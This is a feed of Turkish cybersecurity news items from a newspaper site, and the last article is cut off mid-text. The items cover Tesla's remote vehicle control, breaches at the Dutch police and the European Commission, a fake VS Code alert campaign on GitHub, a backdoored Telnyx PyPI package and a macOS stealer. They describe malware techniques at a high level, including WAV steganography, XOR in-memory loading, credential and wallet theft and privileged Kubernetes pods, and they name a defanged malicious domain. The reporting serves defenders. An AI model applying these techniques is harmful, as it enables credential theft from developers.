<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
     xmlns:admin="http://webns.net/mvcb/"
     xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:media="http://search.yahoo.com/mrss/">
<channel>
<title>Ajans Expres Gazetesi &#45; : Siber Güvenlik</title>
<link>https://www.ajansexpres.com.tr/rss/category/siber-guvenlik</link>
<description>Ajans Expres Gazetesi &#45; : Siber Güvenlik</description>
<dc:language>tr</dc:language>
<dc:rights>Ajans Expres Gazetesi Copyright © Her Hakkı Haber Portalı 5846 sayılı Fikir ve Sanat Eserleri Kanunu&amp;apos;na %100 uygun olarak yayınlanmaktadır. Ajanslardan alınan haberlerin yeniden yayımı ve herhangi bir ortamda basılması, ilgili ajansların bu yöndeki politikasına bağlı olarak önceden yazılı izin gerektirir.</dc:rights>

<item>
<title>Tesla’nın Uzaktan Müdahale Yetkisi Tartışma Yarattı: Araç Kontrolü ve Güvenlik Endişeleri Gündemde</title>
<link>https://www.ajansexpres.com.tr/teslanin-uzaktan-mudahale-yetkisi-tartisma-yaratti-arac-kontrolu-ve-guvenlik-endiseleri-gundemde</link>
<guid>https://www.ajansexpres.com.tr/teslanin-uzaktan-mudahale-yetkisi-tartisma-yaratti-arac-kontrolu-ve-guvenlik-endiseleri-gundemde</guid>
<description><![CDATA[ Yazılım tabanlı araç teknolojilerinin öncüsü Tesla’nın uzaktan erişim ve güncelleme yetenekleri, son dönemde yaşanan örnekler ve kullanıcı iddialarıyla yeniden tartışılmaya başlandı. Araçlara uzaktan müdahale edilmesi, güvenlik ve kullanıcı hakları açısından yeni soruları gündeme taşıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202604/image_870x580_69e49ae0db307.webp" length="59916" type="image/jpeg"/>
<pubDate>Sun, 19 Apr 2026 12:05:47 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>tesla uzaktan araç kontrolü nasıl çalışır, ota güncelleme güvenliği nedir, tesla fsd uzaktan kapatma örnekleri, yazılım tanımlı araç riskleri nelerdir</media:keywords>
<content:encoded><![CDATA[<p><br>Tesla’nın araçlar üzerindeki uzaktan kontrol ve yazılım güncelleme kapasitesi, teknoloji ve güvenlik çevrelerinde yeniden tartışma konusu oldu. Şirketin OTA (Over-the-Air) güncellemeleri aracılığıyla araç fonksiyonlarını değiştirebilmesi, bazı kullanıcılar ve uzmanlar tarafından “kontrol sınırları” açısından değerlendiriliyor.</p>
<p></p>
<p data-start="767" data-end="1064">Sosyal medya ve teknoloji platformlarında paylaşılan örneklerde, Tesla’nın araçları uzaktan uyandırabildiği, yazılım yükleyebildiği ve bazı özellikleri devre dışı bırakabildiği öne sürüldü. Bu müdahalelerin, özellikle yetkisiz yazılım kullanımı veya güvenlik gerekçeleriyle yapıldığı ifade edildi.</p>
<p data-start="1066" data-end="1411"><strong data-start="1066" data-end="1122">“Haklı gerekçelerle müdahale edildi” değerlendirmesi</strong><br data-start="1122" data-end="1125">Paylaşımlarda, Tesla’nın bazı durumlarda güvenlik veya kullanım ihlalleri nedeniyle uzaktan işlem yaptığı belirtildi. Daha önce ikinci el bir Tesla aracında aktif olan sürüş destek özelliklerinin şirket tarafından devre dışı bırakıldığı iddiası, bu tartışmalara örnek olarak gösterildi.</p>
<p data-start="1413" data-end="1648">Benzer şekilde, Powerwall batarya sistemleriyle ilgili bir davada, şirketin bazı cihazlara uzaktan erişerek batarya seviyesini düşürdüğü iddiası da gündeme geldi. Konuya ilişkin dava dosyasında bu müdahalelerin yer aldığı ifade edildi.</p>
<p data-start="1650" data-end="1980"><strong data-start="1650" data-end="1682">Kadırov iddiası dikkat çekti</strong><br data-start="1682" data-end="1685">Çeçen lider Ramzan Kadırov’un, silah monte edildiğini belirttiği Cybertruck aracının Tesla tarafından uzaktan devre dışı bırakıldığını iddia etmesi de tartışmaları büyüttü. Bu iddia bağımsız kaynaklarca doğrulanmazken, olay yazılım tabanlı araçların kontrol yetkileri açısından örnek gösterildi.</p>
<p data-start="1982" data-end="2326"><strong data-start="1982" data-end="2029">“Yazılım tanımlı araç” kavramı tartışılıyor</strong><br data-start="2029" data-end="2032">Uzmanlar, Tesla gibi üreticilerin geliştirdiği “yazılım tanımlı araç” modelinin, araç üzerindeki kontrolün kısmen üreticide kalmasına yol açtığını belirtti. OTA altyapısının sürekli aktif olması nedeniyle, araçların sensör, batarya ve sürüş sistemlerinin uzaktan güncellenebildiği ifade edildi.</p>
<p data-start="2328" data-end="2596">Batarya yönetim sistemlerinin de yazılım kontrollü olduğuna dikkat çeken bazı değerlendirmelerde, teorik olarak kötü niyetli müdahalelerin risk oluşturabileceği öne sürüldü. Ancak bu tür senaryoların gerçekleştiğine dair doğrulanmış bir vaka bulunmadığı da vurgulandı.</p>
<p data-start="2598" data-end="2933"><strong data-start="2598" data-end="2637">Güvenlik ve etik tartışması büyüyor</strong><br data-start="2637" data-end="2640">Uzaktan müdahale yetkisi, bir yandan güvenlik açıklarını kapatma ve yasa dışı kullanımı önleme avantajı sağlarken, diğer yandan kullanıcı hakları ve kontrol sınırları konusunda soru işaretleri doğuruyor. Uzmanlar, bu tür sistemlerin daha şeffaf ve denetlenebilir olması gerektiğini ifade etti.</p>
<p data-start="2935" data-end="3100"><strong data-start="2935" data-end="2947"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>HOLLANDA POLİSİ FİŞİNG SALDIRISI SONRASI GÜVENLİK İHLALİNİ DOĞRULADI</title>
<link>https://www.ajansexpres.com.tr/hollanda-polisi-fising-saldirisi-sonrasi-guvenlik-ihlalini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/hollanda-polisi-fising-saldirisi-sonrasi-guvenlik-ihlalini-dogruladi</guid>
<description><![CDATA[ Hollanda Ulusal Polisi, kimlik avı saldırısı sonucu yaşanan siber güvenlik ihlalinin sınırlı etkide kaldığını ve vatandaş verilerinin etkilenmediğini açıkladı. Olayın ardından erişimler kesilirken hem teknik hem de adli soruşturma başlatıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69c9886967dd1.webp" length="57424" type="image/jpeg"/>
<pubDate>Sun, 29 Mar 2026 23:16:01 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>hollanda polisi phishing saldırısı nedir, kimlik avı saldırısı nasıl gerçekleşir, polis verileri sızdırıldı mı, siber saldırılara karşı hangi önlemler alınır</media:keywords>
<content:encoded><![CDATA[<p>Hollanda Ulusal Polisi (Politie), <strong data-start="394" data-end="484">başarılı bir kimlik avı (phishing) saldırısı sonucunda bir güvenlik ihlali yaşandığını</strong> duyurdu. Kurum, olayın etkisinin sınırlı olduğunu ve <strong data-start="538" data-end="584">vatandaşlara ait verilerin etkilenmediğini</strong> bildirdi.</p>
<p></p>
<p data-start="596" data-end="916">Polis tarafından yapılan açıklamada, saldırının kurumun <strong data-start="652" data-end="688">Güvenlik Operasyon Merkezi (SOC)</strong> tarafından kısa sürede tespit edildiği ve gerekli önlemlerin hızla alındığı ifade edildi. Açıklamada,<br data-start="790" data-end="793">“Polis bir kimlik avı saldırısının hedefi oldu. Olay çok hızlı şekilde tespit edildi ve erişim derhal engellendi.” denildi.</p>
<p data-start="918" data-end="954"><strong data-start="918" data-end="954">“Vatandaş verilerine erişim yok”</strong></p>
<p data-start="956" data-end="1151">Yetkililer, olayın etkilerine ilişkin değerlendirmede bulunarak,<br data-start="1020" data-end="1023">“Etkiler hâlen inceleniyor ancak sınırlı görünüyor. Vatandaş verileri ve soruşturma bilgilerine erişilmedi.” açıklamasını yaptı.</p>
<p data-start="1153" data-end="1258">Polis ayrıca olayla ilgili <strong data-start="1180" data-end="1215">cezai soruşturma başlatıldığını</strong> ve teknik incelemelerin sürdüğünü duyurdu.</p>
<p data-start="1260" data-end="1291"><strong data-start="1260" data-end="1291">Detaylar henüz paylaşılmadı</strong></p>
<p data-start="1293" data-end="1488">Yetkililer, saldırının <strong data-start="1316" data-end="1349">hangi sistemleri hedef aldığı</strong>, olayın tam olarak <strong data-start="1369" data-end="1395">ne zaman gerçekleştiği</strong> ve herhangi bir personel verisinin etkilenip etkilenmediği konusunda henüz detay paylaşmadı.</p>
<p data-start="1490" data-end="1562">Basın tarafından yöneltilen sorulara da ek bilgi verilmediği bildirildi.</p>
<p data-start="1564" data-end="1600"><strong data-start="1564" data-end="1600">Önceki saldırılar dikkat çekiyor</strong></p>
<p data-start="1602" data-end="1849">Hollanda polisi, daha önce de <strong data-start="1632" data-end="1709">Eylül 2024’te devlet destekli olduğu değerlendirilen bir siber saldırıyla</strong> gündeme gelmişti. Bu olayda, çok sayıda polis personeline ait <strong data-start="1772" data-end="1835">isim, e-posta, telefon ve bazı özel bilgilerin sızdırıldığı</strong> açıklanmıştı.</p>
<p data-start="1851" data-end="2026">Söz konusu veri ihlaline ilişkin yürütülen kapsamlı incelemenin hâlen devam ettiği ve saldırının yöntemi ya da sorumlularına ilişkin resmi bir açıklama yapılmadığı belirtildi.</p>
<p data-start="2028" data-end="2060"><strong data-start="2028" data-end="2060">Güvenlik önlemleri artırıldı</strong></p>
<p data-start="2062" data-end="2189">Önceki saldırıların ardından kurumun, sistemlerini daha güvenli hale getirmek için yeni önlemler aldığı aktarıldı. Bu kapsamda:</p>
<ul data-start="2191" data-end="2340">
<li data-section-id="kxelbl" data-start="2191" data-end="2224">
<p data-start="2193" data-end="2224">Sistemlerin sürekli izlenmesi</p>
</li>
<li data-section-id="10hhkwi" data-start="2225" data-end="2263">
<p data-start="2227" data-end="2263">Şüpheli aktivitelerin anlık takibi</p>
</li>
<li data-section-id="wro5vg" data-start="2264" data-end="2340">
<p data-start="2266" data-end="2340">Personel hesaplarında daha sık iki faktörlü kimlik doğrulama uygulanması</p>
</li>
</ul>
<p data-start="2342" data-end="2387">gibi adımların devreye alındığı ifade edildi.</p>
<p data-start="2389" data-end="2522">Yetkililer, son olayın ardından da benzer güvenlik tedbirlerinin gözden geçirildiğini ve sürecin yakından takip edildiğini vurguladı.</p>
<p data-start="2524" data-end="2696"><strong data-start="2524" data-end="2536"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>AVRUPA KOMİSYONU AMAZON BULUT HESABI İHLALİ SONRASI GENİŞ ÇAPLI SİBER SALDIRIYI İNCELİYOR</title>
<link>https://www.ajansexpres.com.tr/avrupa-komisyonu-amazon-bulut-hesabi-ihlali-sonrasi-genis-capli-siber-saldiriyi-inceliyor</link>
<guid>https://www.ajansexpres.com.tr/avrupa-komisyonu-amazon-bulut-hesabi-ihlali-sonrasi-genis-capli-siber-saldiriyi-inceliyor</guid>
<description><![CDATA[ Avrupa Komisyonu’nun Amazon Web Services altyapısına yönelik gerçekleşen siber saldırı sonrası en az bir hesabın ele geçirildiği ortaya çıktı. 350 GB’tan fazla verinin çalındığını iddia eden saldırganın verileri ilerleyen süreçte yayımlayabileceği belirtilirken, olayla ilgili kapsamlı inceleme başlatıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69c987fc0a811.webp" length="58366" type="image/jpeg"/>
<pubDate>Sun, 29 Mar 2026 23:14:00 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>avrupa komisyonu aws hack olayı nedir, aws hesabı nasıl ele geçirilir, 350 gb veri sızıntısı ne anlama geliyor, avrupa siber güvenlik yasası neleri kapsıyor</media:keywords>
<content:encoded><![CDATA[<p>Avrupa Birliği’nin yürütme organı olan <strong data-start="484" data-end="504">Avrupa Komisyonu</strong>, Amazon Web Services (AWS) altyapısına yönelik gerçekleştirilen bir siber saldırının ardından <strong data-start="599" data-end="638">güvenlik ihlalini soruşturmaya aldı</strong>. Olayın kamuoyuna resmi olarak açıklanmadığı ancak en az bir AWS hesabının etkilendiği bildirildi.</p>
<p></p>
<p data-start="739" data-end="899">Konuya ilişkin açıklama yapan bir AWS sözcüsü,<br data-start="785" data-end="788">“AWS herhangi bir güvenlik olayı yaşamadı ve hizmetlerimiz tasarlandığı şekilde çalıştı.” ifadelerini kullandı.</p>
<p data-start="901" data-end="1030">Kaynaklar, saldırının kısa sürede tespit edildiğini ve <strong data-start="956" data-end="1021">Komisyonun siber olay müdahale ekibinin inceleme başlattığını</strong> aktardı.</p>
<p data-start="1032" data-end="1073"><strong data-start="1032" data-end="1073">“350 GB’tan fazla veri ele geçirildi”</strong></p>
<p data-start="1075" data-end="1271">Saldırıyı üstlenen tehdit aktörü, ele geçirdiğini iddia ettiği verilere ilişkin şu bilgileri paylaştı:<br data-start="1177" data-end="1180">“350 GB’tan fazla veri elde edildi ve bu veriler arasında çok sayıda veritabanı bulunuyor.”</p>
<p data-start="1273" data-end="1425">Saldırganın, Avrupa Komisyonu çalışanlarına ait bilgiler ve bir e-posta sunucusuna erişimi gösteren ekran görüntülerini kanıt olarak sunduğu belirtildi.</p>
<p data-start="1427" data-end="1597">Aynı kişi, elde edilen veriler üzerinden <strong data-start="1468" data-end="1503">fidye talebinde bulunmayacağını</strong>, ancak verileri ilerleyen süreçte <strong data-start="1538" data-end="1585">internet üzerinden yayımlamayı planladığını</strong> ifade etti.</p>
<p data-start="1599" data-end="1641"><strong data-start="1599" data-end="1641">Saldırı yöntemi belirsizliğini koruyor</strong></p>
<p data-start="1643" data-end="1880">Yetkililer, saldırının nasıl gerçekleştirildiğine dair henüz teknik detay paylaşmadı. Olayın, doğrudan AWS altyapısından kaynaklanmadığı, daha çok <strong data-start="1790" data-end="1835">hesap erişim bilgilerinin ele geçirilmesi</strong> ihtimali üzerinde durulduğu değerlendirildi.</p>
<p data-start="1882" data-end="1926"><strong data-start="1882" data-end="1926">Avrupa kurumları art arda hedef alınıyor</strong></p>
<p data-start="1928" data-end="2109">Avrupa Komisyonu, Şubat ayında da bir güvenlik ihlalini kamuoyuna açıklamıştı. 30 Ocak’ta tespit edilen olayda, çalışan cihazlarının yönetildiği platformun hacklendiği duyurulmuştu.</p>
<p data-start="2111" data-end="2367">Söz konusu saldırının, <strong data-start="2134" data-end="2175">Ivanti Endpoint Manager Mobile (EPMM)</strong> yazılımındaki açıkları hedef alan ve Hollanda Veri Koruma Kurumu ile Finlandiya Maliye Bakanlığına bağlı Valtori gibi kurumları da etkileyen saldırılarla bağlantılı olabileceği belirtilmişti.</p>
<p data-start="2369" data-end="2399"><strong data-start="2369" data-end="2399">Yeni düzenlemeler gündemde</strong></p>
<p data-start="2401" data-end="2683">Yaşanan son gelişmeler, Avrupa Komisyonu’nun <strong data-start="2446" data-end="2501">20 Ocak’ta sunduğu yeni siber güvenlik yasa teklifi</strong> ile aynı döneme denk geldi. Söz konusu düzenlemenin, devlet destekli saldırılar ve siber suç gruplarına karşı Avrupa’nın kritik altyapılarını güçlendirmeyi hedeflediği ifade edildi.</p>
<p data-start="2685" data-end="2864">Öte yandan, Avrupa Birliği Konseyi’nin geçtiğimiz hafta <strong data-start="2741" data-end="2850">kritik altyapılara yönelik siber saldırılar nedeniyle Çin ve İran merkezli üç şirkete yaptırım uyguladığı</strong> hatırlatıldı.</p>
<p data-start="2866" data-end="3037"><strong data-start="2866" data-end="2878"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>GITHUB’DA SAHTE VS CODE GÜVENLİK UYARILARI GELİŞTİRİCİLERE ZARARLI YAZILIM DAĞITIYOR</title>
<link>https://www.ajansexpres.com.tr/githubda-sahte-vs-code-guvenlik-uyarilari-gelistiricilere-zararli-yazilim-dagitiyor</link>
<guid>https://www.ajansexpres.com.tr/githubda-sahte-vs-code-guvenlik-uyarilari-gelistiricilere-zararli-yazilim-dagitiyor</guid>
<description><![CDATA[ GitHub üzerindeki projelerde paylaşılan sahte Visual Studio Code güvenlik uyarıları, geliştiricileri kandırarak zararlı yazılım indirmeye yönlendiriyor. Binlerce depoyu etkileyen organize kampanyada saldırganlar, gerçek araştırmacıları taklit ederek güven kazanmaya çalışıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69c987884259f.webp" length="57606" type="image/jpeg"/>
<pubDate>Sun, 29 Mar 2026 23:12:22 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>github sahte güvenlik uyarısı nedir, vs code zararlı eklenti nasıl anlaşılır, cve numarası nasıl doğrulanır, geliştiricilere yönelik siber saldırılar nasıl yapılır</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik araştırmacıları, <strong data-start="442" data-end="529">GitHub platformunda geliştiricileri hedef alan geniş çaplı bir saldırı kampanyasını</strong> ortaya çıkardı. Saldırganların, <strong data-start="562" data-end="648">Visual Studio Code (VS Code) güvenlik açığı uyarısı gibi görünen sahte paylaşımlar</strong> aracılığıyla kullanıcıları zararlı yazılım indirmeye yönlendirdiği bildirildi.</p>
<p></p>
<p data-start="729" data-end="993">Application security firması Socket tarafından yayımlanan raporda, saldırının <strong data-start="807" data-end="845">organize ve otomatik bir operasyon</strong> olduğu vurgulandı. Sahte içeriklerin, GitHub’daki <strong data-start="896" data-end="927">“Discussions” (Tartışmalar)</strong> bölümüne kısa sürede binlerce depo üzerinde yayıldığı belirtildi.</p>
<p data-start="995" data-end="1028"><strong data-start="995" data-end="1028">“Gerçek uyarı gibi görünüyor”</strong></p>
<p data-start="1030" data-end="1169">Araştırmacılar, saldırganların paylaşımlarında şu tür başlıklar kullandığını aktardı:<br data-start="1115" data-end="1118">“Severe Vulnerability - Immediate Update Required.”</p>
<p data-start="1171" data-end="1358">Bu paylaşımlarda <strong data-start="1188" data-end="1212">sahte CVE numaraları</strong>, aciliyet vurgusu ve bazı durumlarda <strong data-start="1250" data-end="1295">gerçek geliştiricilerin kimliğine bürünme</strong> gibi yöntemlerle güven oluşturulmaya çalışıldığı ifade edildi.</p>
<p data-start="1360" data-end="1616">Socket araştırmacıları, kampanyanın boyutuna dikkat çekerek,<br data-start="1420" data-end="1423">“Binlerce depoda neredeyse aynı içeriklerin paylaşılması, bunun izole bir olay değil, koordineli bir spam ve zararlı yazılım dağıtım operasyonu olduğunu gösteriyor.” değerlendirmesinde bulundu.</p>
<p data-start="1618" data-end="1662"><strong data-start="1618" data-end="1662">E-posta bildirimleri üzerinden yayılıyor</strong></p>
<p data-start="1664" data-end="1926">GitHub Discussions özelliğinin, takipçilere ve katılımcılara <strong data-start="1725" data-end="1769">otomatik e-posta bildirimleri göndermesi</strong>, saldırının etkisini artıran önemli bir unsur olarak öne çıktı. Bu sayede sahte uyarıların doğrudan geliştiricilerin e-posta kutularına ulaştığı belirtildi.</p>
<p data-start="1928" data-end="2215">Paylaşımlarda, sözde güncellenmiş VS Code eklentileri için <strong data-start="1987" data-end="2016">Google Drive bağlantıları</strong> yer aldı. Uzmanlar, bu durumun kullanıcılar için yanıltıcı olabileceğini belirterek,<br data-start="2101" data-end="2104">“Google Drive güvenilir bir platform olarak bilinse de resmi yazılım dağıtım kanalı değildir.” uyarısını yaptı.</p>
<p data-start="2217" data-end="2248"><strong data-start="2217" data-end="2248">Çok aşamalı saldırı zinciri</strong></p>
<p data-start="2250" data-end="2423">Zararlı bağlantıya tıklayan kullanıcıların, çerez tabanlı yönlendirme ile <strong data-start="2324" data-end="2348">drnatashachinn[.]com</strong> adresine yönlendirildiği tespit edildi. Burada çalışan JavaScript kodunun:</p>
<ul data-start="2425" data-end="2508">
<li data-section-id="1gkbdp" data-start="2425" data-end="2441">
<p data-start="2427" data-end="2441">Zaman dilimi</p>
</li>
<li data-section-id="tu66q4" data-start="2442" data-end="2458">
<p data-start="2444" data-end="2458">Dil ayarları</p>
</li>
<li data-section-id="1u78wa9" data-start="2459" data-end="2486">
<p data-start="2461" data-end="2486">İşletim sistemi bilgisi</p>
</li>
<li data-section-id="1lngd2m" data-start="2487" data-end="2508">
<p data-start="2489" data-end="2508">Tarayıcı verileri</p>
</li>
</ul>
<p data-start="2510" data-end="2582">gibi bilgileri topladığı ve saldırgan sunucularına gönderdiği aktarıldı.</p>
<p data-start="2584" data-end="2753">Araştırmacılar, bu aşamanın bir <strong data-start="2616" data-end="2652">trafik yönlendirme sistemi (TDS)</strong> olarak kullanıldığını ve yalnızca gerçek hedeflere ikinci aşama zararlı yükün iletildiğini belirtti.</p>
<p data-start="2755" data-end="2794"><strong data-start="2755" data-end="2794">“Resmî kaynaklardan doğrulama şart”</strong></p>
<p data-start="2796" data-end="3055">Uzmanlar, benzer saldırıların daha önce de GitHub üzerinden gerçekleştirildiğini hatırlatarak, geliştiricilere şu uyarıda bulundu:<br data-start="2926" data-end="2929">“Güvenlik uyarılarıyla karşılaşıldığında, CVE kayıtları mutlaka NVD, CISA veya MITRE gibi resmî kaynaklardan doğrulanmalıdır.”</p>
<p data-start="3057" data-end="3227">Araştırmacılar ayrıca, <strong data-start="3080" data-end="3166">harici indirme bağlantıları, doğrulanamayan açık numaraları ve toplu etiketlemeler</strong> gibi işaretlerin dikkatle incelenmesi gerektiğini vurguladı.</p>
<p data-start="3229" data-end="3407"><strong data-start="3229" data-end="3241"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>TELNYX PYPI PAKETİNE YERLEŞTİRİLEN ARKA KAPI WAV DOSYASIYLA GİZLENEN ZARARLI YAZILIM DAĞITTI</title>
<link>https://www.ajansexpres.com.tr/telnyx-pypi-paketine-yerlestirilen-arka-kapi-wav-dosyasiyla-gizlenen-zararli-yazilim-dagitti</link>
<guid>https://www.ajansexpres.com.tr/telnyx-pypi-paketine-yerlestirilen-arka-kapi-wav-dosyasiyla-gizlenen-zararli-yazilim-dagitti</guid>
<description><![CDATA[ Python Package Index’te (PyPI) yer alan Telnyx yazılım paketine sızan saldırganlar, zararlı kodu WAV ses dosyası içine gizleyerek geliştiricileri hedef aldı. Uzmanlar, etkilenen sistemlerin tamamen ele geçirilmiş sayılması gerektiğini belirterek acil önlem çağrısı yaptı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69c9871eeaa1c.webp" length="54944" type="image/jpeg"/>
<pubDate>Sun, 29 Mar 2026 23:10:35 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>telnyx pypi saldırısı nedir, wav dosyası içine zararlı yazılım nasıl gizlenir, tedarik zinciri saldırısı nasıl gerçekleşir, python paket güvenliği nasıl sağlanır</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik firmaları, <strong data-start="439" data-end="519">Telnyx Python paketine yönelik gerçekleştirilen tedarik zinciri saldırısında</strong>, zararlı yazılımın <strong data-start="539" data-end="589">WAV ses dosyası içine gizlenerek dağıtıldığını</strong> açıkladı. Saldırının, daha önce benzer operasyonlarla ilişkilendirilen <strong data-start="661" data-end="672">TeamPCP</strong> adlı tehdit aktörü tarafından gerçekleştirildiği değerlendirildi.</p>
<p></p>
<p data-start="740" data-end="1040">Aikido, Socket ve Endor Labs araştırmacıları, saldırganların <strong data-start="801" data-end="876">Telnyx paketinin 4.87.1 ve 4.87.2 sürümlerine arka kapı yerleştirdiğini</strong> tespit etti. Söz konusu paketin, aylık <strong data-start="916" data-end="966">740 binden fazla indirme sayısına sahip olması</strong>, tehdidin geniş bir geliştirici kitlesini etkileyebileceğine işaret etti.</p>
<p data-start="1042" data-end="1082"><strong data-start="1042" data-end="1082">“Zararlı kod ses dosyasına gizlendi”</strong></p>
<p data-start="1084" data-end="1328">Araştırmacılar, saldırının teknik detaylarına ilişkin şu bilgileri paylaştı:<br data-start="1160" data-end="1163">“Zararlı yük, WAV dosyasının veri çerçeveleri içine steganografi yöntemiyle gizlendi. Ses dosyasının yapısı bozulmadan, kötü amaçlı kod sistemde çalıştırılabiliyor.”</p>
<p data-start="1330" data-end="1495">Uzmanlar, bu yöntemin tespit edilmesini zorlaştırdığına dikkat çekerek, zararlı kodun <strong data-start="1416" data-end="1483">XOR tabanlı bir çözme tekniğiyle bellek içinde çalıştırıldığını</strong> ifade etti.</p>
<p data-start="1497" data-end="1535"><strong data-start="1497" data-end="1535">Geliştirici ortamları hedef alındı</strong></p>
<p data-start="1537" data-end="1800">Saldırı kapsamında, zararlı kodun <strong data-start="1571" data-end="1641">‘telnyx/_client.py’ dosyası üzerinden otomatik olarak tetiklendiği</strong> ve kütüphane içe aktarıldığında devreye girdiği belirtildi. Bu sayede, uygulama normal şekilde çalışmaya devam ederken arka planda veri sızıntısı gerçekleşti.</p>
<p data-start="1802" data-end="1847">Linux ve macOS sistemlerde zararlı yazılımın:</p>
<ul data-start="1849" data-end="1977">
<li data-section-id="1ek4l2o" data-start="1849" data-end="1870">
<p data-start="1851" data-end="1870">SSH anahtarlarını</p>
</li>
<li data-section-id="pnrcfp" data-start="1871" data-end="1893">
<p data-start="1873" data-end="1893">Kimlik bilgilerini</p>
</li>
<li data-section-id="18nolfo" data-start="1894" data-end="1923">
<p data-start="1896" data-end="1923">Bulut erişim token’larını</p>
</li>
<li data-section-id="1tdj4y6" data-start="1924" data-end="1952">
<p data-start="1926" data-end="1952">Kripto para cüzdanlarını</p>
</li>
<li data-section-id="1rmuttc" data-start="1953" data-end="1977">
<p data-start="1955" data-end="1977">Ortam değişkenlerini</p>
</li>
</ul>
<p data-start="1979" data-end="2000">topladığı bildirildi.</p>
<p data-start="2002" data-end="2129">Windows sistemlerde ise farklı bir yükün indirilerek <strong data-start="2055" data-end="2117">başlangıç klasörüne yerleştirildiği ve kalıcılık sağladığı</strong> kaydedildi.</p>
<p data-start="2131" data-end="2173"><strong data-start="2131" data-end="2173">Kubernetes sistemlerine sızma girişimi</strong></p>
<p data-start="2175" data-end="2419">Araştırmada, zararlı yazılımın Kubernetes ortamlarını da hedef aldığı belirtildi. Buna göre zararlı kodun,<br data-start="2281" data-end="2284">“Kubernetes küme gizli verilerini tespit ederek ayrıcalıklı pod’lar dağıttığı ve ana sistemlere erişim sağlamaya çalıştığı.” aktarıldı.</p>
<p data-start="2421" data-end="2454"><strong data-start="2421" data-end="2454">Hesap ele geçirilmiş olabilir</strong></p>
<p data-start="2456" data-end="2731">Uzmanlar, saldırının büyük olasılıkla <strong data-start="2494" data-end="2550">PyPI üzerindeki yayıncı hesabının ele geçirilmesiyle</strong> gerçekleştirildiğini değerlendirdi. İlk olarak yayımlanan 4.87.1 sürümünün hatalı olduğu, saldırganların kısa süre içinde <strong data-start="2673" data-end="2717">4.87.2 sürümüyle zararlı yükü düzelttiği</strong> ifade edildi.</p>
<p data-start="2733" data-end="3026">Güvenlik araştırmacıları, <strong data-start="2759" data-end="2796">4.87.0 sürümünün güvenli olduğunu</strong> vurgulayarak geliştiricilere şu uyarıyı yaptı:<br data-start="2843" data-end="2846">“Eğer sistemlerinizde zararlı sürümler çalıştırıldıysa, bu sistemler tamamen ele geçirilmiş kabul edilmelidir. Tüm kimlik bilgileri ve erişim anahtarları derhal değiştirilmelidir.”</p>
<p data-start="3028" data-end="3204"><strong data-start="3028" data-end="3040"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>INFINITY STEALER MACOS KULLANICILARINI SAHTE DOĞRULAMA TUZAĞIYLA HEDEF ALIYOR</title>
<link>https://www.ajansexpres.com.tr/infinity-stealer-macos-kullanicilarini-sahte-dogrulama-tuzagiyla-hedef-aliyor</link>
<guid>https://www.ajansexpres.com.tr/infinity-stealer-macos-kullanicilarini-sahte-dogrulama-tuzagiyla-hedef-aliyor</guid>
<description><![CDATA[ Yeni ortaya çıkan Infinity Stealer zararlı yazılımı, macOS sistemlerde sahte Cloudflare doğrulama ekranı üzerinden kullanıcıları kandırarak hassas verileri ele geçiriyor. Araştırmacılar, saldırının gelişmiş gizleme teknikleriyle tespit edilmesinin zorlaştığını belirtiyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69c9869927ed9.webp" length="51254" type="image/jpeg"/>
<pubDate>Sun, 29 Mar 2026 23:08:03 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>infinity stealer nedir, macos zararlı yazılım nasıl bulaşır, clickfix saldırı yöntemi nedir, terminale komut yapıştırmak neden riskli</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik araştırmacıları, <strong data-start="431" data-end="508">macOS kullanıcılarını hedef alan yeni bir bilgi hırsızı zararlı yazılımın</strong> ortaya çıktığını duyurdu. <strong data-start="535" data-end="555">Infinity Stealer</strong> adı verilen bu tehdit, kullanıcıları sahte doğrulama ekranları aracılığıyla kandırarak sistemlerine sızıyor ve kritik verileri ele geçiriyor.</p>
<p></p>
<p data-start="699" data-end="1014">Malwarebytes araştırmacıları tarafından analiz edilen saldırının, <strong data-start="765" data-end="777">ClickFix</strong> adı verilen sosyal mühendislik tekniğiyle gerçekleştirildiği belirtildi. Söz konusu yöntemde, kullanıcıya <strong data-start="884" data-end="970">Cloudflare insan doğrulaması taklit edilerek sahte bir CAPTCHA ekranı gösteriliyor</strong> ve Terminal’e komut yapıştırması isteniyor.</p>
<p data-start="1016" data-end="1064"><strong data-start="1016" data-end="1064">“Gerçek bir macOS uygulaması gibi çalışıyor”</strong></p>
